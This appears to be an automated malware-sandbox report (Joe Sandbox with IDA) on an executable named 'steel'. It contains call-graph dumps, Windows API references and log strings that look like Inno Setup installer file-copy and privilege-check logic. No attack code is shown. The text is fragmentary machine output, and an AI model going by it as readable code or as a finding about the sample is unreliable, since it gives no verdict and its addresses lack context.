53945->54040 54041 40e080 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53945->54041 54037 40ba24 53946->54037 53986 40e3c0 53947->53986 53953 40e1b5 53954 403400 4 API calls 53953->53954 53955 40e25c 53954->53955 53955->53930 53958 40ea08 5 API calls 53957->53958 53959 40d5ea 53958->53959 53959->53930 54074 40d4bc 53960->54074 54083 40df54 53963->54083 53966 40e96c 5 API calls 53967 40db9e 53966->53967 53968 40e96c 5 API calls 53967->53968 53969 40dba9 53968->53969 53970 40dbc4 53969->53970 53971 40dbbb 53969->53971 53976 40dbc1 53969->53976 54090 40d9d8 53970->54090 54093 40dac8 19 API calls 53971->54093 53974 403420 4 API calls 53975 40dc8f 53974->53975 53975->53936 53976->53974 54043 40d780 53977->54043 53980 4034e0 4 API calls 53981 40e98f 53980->53981 53982 403744 4 API calls 53981->53982 53983 40e996 53982->53983 53984 40d780 5 API calls 53983->53984 53985 40e9a4 53984->53985 53985->53945 53987 40e3ec 53986->53987 53989 40e3f6 53986->53989 54048 40d440 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53987->54048 53990 40e511 53989->53990 53991 40e495 53989->53991 53992 40e4f6 53989->53992 53993 40e576 53989->53993 53994 40e438 53989->53994 53995 40e4d9 53989->53995 53996 40e47a 53989->53996 53997 40e4bb 53989->53997 54008 40e45c 53989->54008 54000 40d764 5 API calls 53990->54000 54056 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53991->54056 54061 40e890 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53992->54061 54004 40d764 5 API calls 53993->54004 54049 40d764 53994->54049 54059 40e9a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53995->54059 54055 40d818 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53996->54055 54058 40dde4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53997->54058 54009 40e519 54000->54009 54003 403400 4 API calls 54010 40e5eb 54003->54010 54011 40e57e 54004->54011 54007 40e4a0 54057 40d470 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54007->54057 54008->54003 54017 40e523 54009->54017 54018 40e51d 54009->54018 54010->53953 54019 40e582 54011->54019 54020 40e59b 54011->54020 54012 40e4e4 54060 409d38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54012->54060 54014 40e461 54054 40ded8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54014->54054 54015 40e444 54052 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54015->54052 54062 40ea08 54017->54062 54025 40e521 54018->54025 54026 40e53c 54018->54026 54028 40ea08 5 API calls 54019->54028 54068 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54020->54068 54066 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54025->54066 54029 40ea08 5 API calls 54026->54029 54028->54008 54031 40e544 54029->54031 54030 40e44f 54053 40e26c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54030->54053 54065 40d8a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54031->54065 54034 40e566 54067 40e2d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54034->54067 54069 40b9d0 54037->54069 54040->53945 54041->53945 54042 40d774 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54042->53953 54046 40d78b 54043->54046 54044 40d7c5 54044->53980 54046->54044 54047 40d7cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54046->54047 54047->54046 54048->53989 54050 40ea08 5 API calls 54049->54050 54051 40d76e 54050->54051 54051->54014 54051->54015 54052->54030 54053->54008 54054->54008 54055->54008 54056->54007 54057->54008 54058->54008 54059->54012 54060->54008 54061->54008 54063 40d780 5 API calls 54062->54063 54064 40ea15 54063->54064 54064->54008 54065->54008 54066->54034 54067->54008 54068->54008 54070 40b9e2 54069->54070 54072 40ba07 54069->54072 54070->54072 54073 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54070->54073 54072->53953 54072->54042 54073->54072 54075 40ea08 5 API calls 54074->54075 54076 40d4c9 54075->54076 54077 40d4dc 54076->54077 54081 40eb0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54076->54081 54077->53936 54079 40d4d7 54082 40d458 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54079->54082 54081->54079 54082->54077 54084 40d764 5 API calls 54083->54084 54085 40df6b 54084->54085 54086 40db93 54085->54086 54087 40ea08 5 API calls 54085->54087 54086->53966 54088 40df78 54087->54088 54088->54086 54094 40ded8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54088->54094 54095 40ab7c 19 API calls 54090->54095 54092 40da00 54092->53976 54093->53976 54094->54086 54095->54092 56296 41363c SetWindowLongA GetWindowLongA 56297 41367b GetWindowLongA 56296->56297 56299 413699 SetPropA SetPropA 56296->56299 56298 41368a SetWindowLongA 56297->56298 56297->56299 56298->56299 56303 41f39c 56299->56303 56308 415270 56303->56308 56315 423c0c 56303->56315 56409 423a84 56303->56409 56304 4136e9 56309 41527d 56308->56309 56310 4152e3 56309->56310 56311 4152d8 56309->56311 56314 4152e1 56309->56314 56416 424b8c 13 API calls 56310->56416 56311->56314 56417 41505c 46 API calls 56311->56417 56314->56304 56320 423c42 56315->56320 56318 423cec 56321 423cf3 56318->56321 56322 423d27 56318->56322 56319 423c8d 56323 423c93 56319->56323 56324 423d50 56319->56324 56335 423c63 56320->56335 56418 423b68 56320->56418 56325 423cf9 56321->56325 56360 423fb1 56321->56360 56328 423d32 56322->56328 56329 42409a IsIconic 56322->56329 56326 423cc5 56323->56326 56327 423c98 56323->56327 56330 423d62 56324->56330 56331 423d6b 56324->56331 56333 423f13 SendMessageA 56325->56333 56334 423d07 56325->56334 56326->56335 56358 423cde 56326->56358 56359 423e3f 56326->56359 56337 423df6 56327->56337 56338 423c9e 56327->56338 56339 4240d6 56328->56339 56340 423d3b 56328->56340 56329->56335 56336 4240ae GetFocus 56329->56336 56341 423d78 56330->56341 56342 423d69 56330->56342 56425 424194 11 API calls 56331->56425 56333->56335 56334->56335 56361 423cc0 56334->56361 56389 423f56 56334->56389 56335->56304 56336->56335 56346 4240bf 56336->56346 56430 423b84 NtdllDefWindowProc_A 56337->56430 56347 423ca7 56338->56347 56348 423e1e PostMessageA 56338->56348 56439 424850 WinHelpA PostMessageA 56339->56439 56344 4240ed 56340->56344 56340->56361 56345 4241dc 11 API calls 56341->56345 56426 423b84 NtdllDefWindowProc_A 56342->56426 56356 4240f6 56344->56356 56357 42410b 56344->56357 56345->56335 56438 41eff4 GetCurrentThreadId EnumThreadWindows 56346->56438 56353 423cb0 56347->56353 56354 423ea5 56347->56354 56431 423b84 NtdllDefWindowProc_A 56348->56431 56366 423cb9 56353->56366 56367 423dce IsIconic 56353->56367 56368 423eae 56354->56368 56369 423edf 56354->56369 56355 423e39 56355->56335 56370 4244d4 5 API calls 56356->56370 56440 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56357->56440 56358->56361 56362 423e0b 56358->56362 56422 423b84 NtdllDefWindowProc_A 56359->56422 56360->56335 56380 423fd7 IsWindowEnabled 56360->56380 56361->56335 56424 423b84 NtdllDefWindowProc_A 56361->56424 56375 424178 12 API calls 56362->56375 56365 4240c6 56365->56335 56377 4240ce SetFocus 56365->56377 56366->56361 56378 423d91 56366->56378 56371 423dea 56367->56371 56372 423dde 56367->56372 56433 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56368->56433 56423 423b84 NtdllDefWindowProc_A 56369->56423 56370->56335 56429 423b84 NtdllDefWindowProc_A 56371->56429 56428 423bc0 15 API calls 56372->56428 56375->56335 56376 423e45 56384 423e83 56376->56384 56385 423e61 56376->56385 56377->56335 56378->56335 56427 422c4c ShowWindow PostMessageA PostQuitMessage 56378->56427 56380->56335 56387 423fe5 56380->56387 56383 423ee5 56388 423efd 56383->56388 56396 41eea4 2 API calls 56383->56396 56391 423a84 6 API calls 56384->56391 56432 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56385->56432 56386 423eb6 56393 423ec8 56386->56393 56394 41ef58 6 API calls 56386->56394 56401 423fec IsWindowVisible 56387->56401 56397 423a84 6 API calls 56388->56397 56389->56335 56398 423f78 IsWindowEnabled 56389->56398 56400 423e8b PostMessageA 56391->56400 56434 423b84 NtdllDefWindowProc_A 56393->56434 56394->56393 56396->56388 56397->56335 56398->56335 56402 423f86 56398->56402 56399 423e69 PostMessageA 56399->56335 56400->56335 56401->56335 56403 423ffa GetFocus 56401->56403 56435 412310 7 API calls 56402->56435 56405 4181e0 56403->56405 56406 42400f SetFocus 56405->56406 56436 415240 56406->56436 56410 423b0d 56409->56410 56411 423a94 56409->56411 56410->56304 56411->56410 56412 423a9a EnumWindows 56411->56412 56412->56410 56413 423ab6 GetWindow GetWindowLongA 56412->56413 56441 423a1c GetWindow 56412->56441 56414 423ad5 56413->56414 56414->56410 56415 423b01 SetWindowPos 56414->56415 56415->56410 56415->56414 56416->56314 56417->56314 56419 423b72 56418->56419 56420 423b7d 56418->56420 56419->56420 56421 408720 7 API calls 56419->56421 56420->56318 56420->56319 56421->56420 56422->56376 56423->56383 56424->56335 56425->56335 56426->56335 56427->56335 56428->56335 56429->56335 56430->56335 56431->56355 56432->56399 56433->56386 56434->56335 56435->56335 56437 41525b SetFocus 56436->56437 56437->56335 56438->56365 56439->56355 56440->56355 56442 423a3d GetWindowLongA 56441->56442 56443 423a49 56441->56443 56442->56443 56444 4809f7 56445 480a00 56444->56445 56446 480a2b 56444->56446 56445->56446 56447 480a1d 56445->56447 56449 480a6a 56446->56449 56818 47f4a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56446->56818 56816 476c50 189 API calls 56447->56816 56450 480a8e 56449->56450 56453 480a81 56449->56453 56454 480a83 56449->56454 56456 480aca 56450->56456 56457 480aac 56450->56457 56452 480a5d 56819 47f50c 42 API calls 56452->56819 56461 47f4e8 42 API calls 56453->56461 56820 47f57c 42 API calls 56454->56820 56455 480a22 56455->56446 56817 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56455->56817 56823 47f33c 24 API calls 56456->56823 56462 480ac1 56457->56462 56821 47f50c 42 API calls 56457->56821 56461->56450 56822 47f33c 24 API calls 56462->56822 56466 480ac8 56467 480ada 56466->56467 56468 480ae0 56466->56468 56469 480ade 56467->56469 56472 47f4e8 42 API calls 56467->56472 56468->56469 56470 47f4e8 42 API calls 56468->56470 56570 47c66c 56469->56570 56470->56469 56472->56469 56571 42d898 GetWindowsDirectoryA 56570->56571 56572 47c690 56571->56572 56573 403450 4 API calls 56572->56573 56574 47c69d 56573->56574 56575 42d8c4 GetSystemDirectoryA 56574->56575 56576 47c6a5 56575->56576 56577 403450 4 API calls 56576->56577 56578 47c6b2 56577->56578 56579 42d8f0 6 API calls 56578->56579 56580 47c6ba 56579->56580 56581 403450 4 API calls 56580->56581 56582 47c6c7 56581->56582 56583 47c6d0 56582->56583 56584 47c6ec 56582->56584 56855 42d208 56583->56855 56586 403400 4 API calls 56584->56586 56588 47c6ea 56586->56588 56589 47c731 56588->56589 56591 42c8cc 5 API calls 56588->56591 56835 47c4f4 56589->56835 56590 403450 4 API calls 56590->56588 56593 47c70c 56591->56593 56595 403450 4 API calls 56593->56595 56597 47c719 56595->56597 56596 403450 4 API calls 56598 47c74d 56596->56598 56597->56589 56600 403450 4 API calls 56597->56600 56599 47c76b 56598->56599 56601 4035c0 4 API calls 56598->56601 56602 47c4f4 8 API calls 56599->56602 56600->56589 56601->56599 56603 47c77a 56602->56603 56604 403450 4 API calls 56603->56604 56605 47c787 56604->56605 56606 47c7af 56605->56606 56607 42c3fc 5 API calls 56605->56607 56608 47c816 56606->56608 56611 47c4f4 8 API calls 56606->56611 56609 47c79d 56607->56609 56610 47c8de 56608->56610 56615 47c836 SHGetKnownFolderPath 56608->56615 56614 4035c0 4 API calls 56609->56614 56612 47c8e7 56610->56612 56613 47c908 56610->56613 56616 47c7c7 56611->56616 56614->56606 56816->56455 56818->56452 56819->56449 56820->56450 56821->56462 56822->56466 56823->56466 56836 42de1c RegOpenKeyExA 56835->56836 56837 47c51a 56836->56837 56838 47c540 56837->56838 56839 47c51e 56837->56839 56841 403400 4 API calls 56838->56841 56840 42dd4c 6 API calls 56839->56840 56842 47c52a 56840->56842 56843 47c547 56841->56843 56844 47c535 RegCloseKey 56842->56844 56845 403400 4 API calls 56842->56845 56843->56596 56844->56843 56845->56844 56856 4038a4 4 API calls 56855->56856 56858 42d21b 56856->56858 56857 42d232 GetEnvironmentVariableA 56857->56858 56859 42d23e 56857->56859 56858->56857 56862 42d245 56858->56862 56867 42dbd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56858->56867 56860 403400 4 API calls 56859->56860 56860->56862 56862->56590 56867->56858
                                                                                            Strings
                                                                                            • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                            • Same version. Skipping., xrefs: 00470CE5
                                                                                            • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                            • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                            • Installing into GAC, xrefs: 00471714
                                                                                            • InUn, xrefs: 0047115F
                                                                                            • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                            • .tmp, xrefs: 00470FB7
                                                                                            • -- File entry --, xrefs: 004706FB
                                                                                            • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                            • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                            • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                            • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                            • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                            • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                            • Version of existing file: (none), xrefs: 00470CFA
                                                                                            • Dest file exists., xrefs: 004709BB
                                                                                            • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                            • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                            • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                            • Time stamp of our file: %s, xrefs: 0047099B
                                                                                            • @, xrefs: 004707B0
                                                                                            • Version of our file: (none), xrefs: 00470AFC
                                                                                            • Will register the file (a type library) later., xrefs: 00471513
                                                                                            • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                            • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                            • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                            • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                            • Same time stamp. Skipping., xrefs: 00470D55
                                                                                            • Installing the file., xrefs: 00470F09
                                                                                            • Dest filename: %s, xrefs: 00470894
                                                                                            • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                            • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                            • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                            • Stripped read-only attribute., xrefs: 00470EC7
                                                                                            • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                            • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                            • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                            • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                            • API String ID: 0-4021121268
                                                                                            • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                            • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                            • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                            • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
                                                                                            APIs
                                                                                            • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                            • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                            • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                            • API String ID: 2252812187-1888249752
                                                                                            • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                            • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                            • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                            • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                            • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmStartSession), ref: 00450309
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmRegisterResources), ref: 0045031E
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmGetList), ref: 00450333
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmShutdown), ref: 00450348
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmRestart), ref: 0045035D
                                                                                            • GetProcAddress.KERNEL32(6E330000,RmEndSession), ref: 00450372
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoadVersion
                                                                                            • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                            • API String ID: 1968650500-3419246398
                                                                                            • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                            • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                            • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                            • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1794 423c45-423c61 call 40b24c 1791->1794 1797 423cec-423cf1 1792->1797 1798 423c8d 1792->1798 1827 423c63-423c6b 1794->1827 1828 423c70-423c72 1794->1828 1800 423cf3 1797->1800 1801 423d27-423d2c 1797->1801 1802 423c93-423c96 1798->1802 1803 423d50-423d60 1798->1803 1804 423fb1-423fb9 1800->1804 1805 423cf9-423d01 1800->1805 1808 423d32-423d35 1801->1808 1809 42409a-4240a8 IsIconic 1801->1809 1806 423cc5-423cc8 1802->1806 1807 423c98 1802->1807 1810 423d62-423d67 1803->1810 1811 423d6b-423d73 call 424194 1803->1811 1816 424152-42415a 1804->1816 1822 423fbf-423fca call 4181e0 1804->1822 1814 423f13-423f3a SendMessageA 1805->1814 1815 423d07-423d0c 1805->1815 1823 423da9-423db0 1806->1823 1824 423cce-423ccf 1806->1824 1818 423df6-423e06 call 423b84 1807->1818 1819 423c9e-423ca1 1807->1819 1820 4240d6-4240eb call 424850 1808->1820 1821 423d3b-423d3c 1808->1821 1809->1816 1817 4240ae-4240b9 GetFocus 1809->1817 1825 423d78-423d80 call 4241dc 1810->1825 1826 423d69-423d8c call 423b84 1810->1826 1811->1816 1814->1816 1829 423d12-423d13 1815->1829 1830 42404a-424055 1815->1830 1831 424171-424177 1816->1831 1817->1816 1838 4240bf-4240c8 call 41eff4 1817->1838 1818->1816 1839 423ca7-423caa 1819->1839 1840 423e1e-423e3a PostMessageA call 423b84 1819->1840 1820->1816 1833 423d42-423d45 1821->1833 1834 4240ed-4240f4 1821->1834 1822->1816 1866 423fd0-423fdf call 4181e0 IsWindowEnabled 1822->1866 1823->1816 1843 423db6-423dbd 1823->1843 1844 423cd5-423cd8 1824->1844 1845 423f3f-423f46 1824->1845 1825->1816 1826->1816 1827->1831 1828->1792 1828->1794 1846 424072-42407d 1829->1846 1847 423d19-423d1c 1829->1847 1830->1816 1849 42405b-42406d 1830->1849 1850 424120-424127 1833->1850 1851 423d4b 1833->1851 1860 4240f6-424109 call 4244d4 1834->1860 1861 42410b-42411e call 42452c 1834->1861 1838->1816 1898 4240ce-4240d4 SetFocus 1838->1898 1857 423cb0-423cb3 1839->1857 1858 423ea5-423eac 1839->1858 1840->1816 1843->1816 1863 423dc3-423dc9 1843->1863 1864 423cde-423ce1 1844->1864 1865 423e3f-423e5f call 423b84 1844->1865 1845->1816 1853 423f4c-423f51 call 404e54 1845->1853 1846->1816 1875 424083-424095 1846->1875 1872 423d22 1847->1872 1873 423f56-423f5e 1847->1873 1849->1816 1870 42413a-424149 1850->1870 1871 424129-424138 1850->1871 1874 42414b-42414c call 423b84 1851->1874 1853->1816 1881 423cb9-423cba 1857->1881 1882 423dce-423ddc IsIconic 1857->1882 1883 423eae-423ec1 call 423b14 1858->1883 1884 423edf-423ef0 call 423b84 1858->1884 1860->1816 1861->1816 1863->1816 1867 423ce7 1864->1867 1868 423e0b-423e19 call 424178 1864->1868 1911 423e83-423ea0 call 423a84 PostMessageA 1865->1911 1912 423e61-423e7e call 423b14 PostMessageA 1865->1912 1866->1816 1915 423fe5-423ff4 call 4181e0 IsWindowVisible 1866->1915 1867->1874 1868->1816 1870->1816 1871->1816 1872->1874 1873->1816 1896 423f64-423f6b 1873->1896 1907 424151 1874->1907 1875->1816 1899 423cc0 1881->1899 1900 423d91-423d99 1881->1900 1889 423dea-423df1 call 423b84 1882->1889 1890 423dde-423de5 call 423bc0 1882->1890 1924 423ed3-423eda call 423b84 1883->1924 1925 423ec3-423ecd call 41ef58 1883->1925 1918 423ef2-423ef8 call 41eea4 1884->1918 1919 423f06-423f0e call 423a84 1884->1919 1889->1816 1890->1816 1896->1816 1910 423f71-423f80 call 4181e0 IsWindowEnabled 1896->1910 1898->1816 1899->1874 1900->1816 1913 423d9f-423da4 call 422c4c 1900->1913 1907->1816 1910->1816 1940 423f86-423f9c call 412310 1910->1940 1911->1816 1912->1816 1913->1816 1915->1816 1941 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1915->1941 1938 423efd-423f00 1918->1938 1919->1816 1924->1816 1925->1924 1938->1919 1940->1816 1946 423fa2-423fac 1940->1946 1941->1816 1946->1816
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
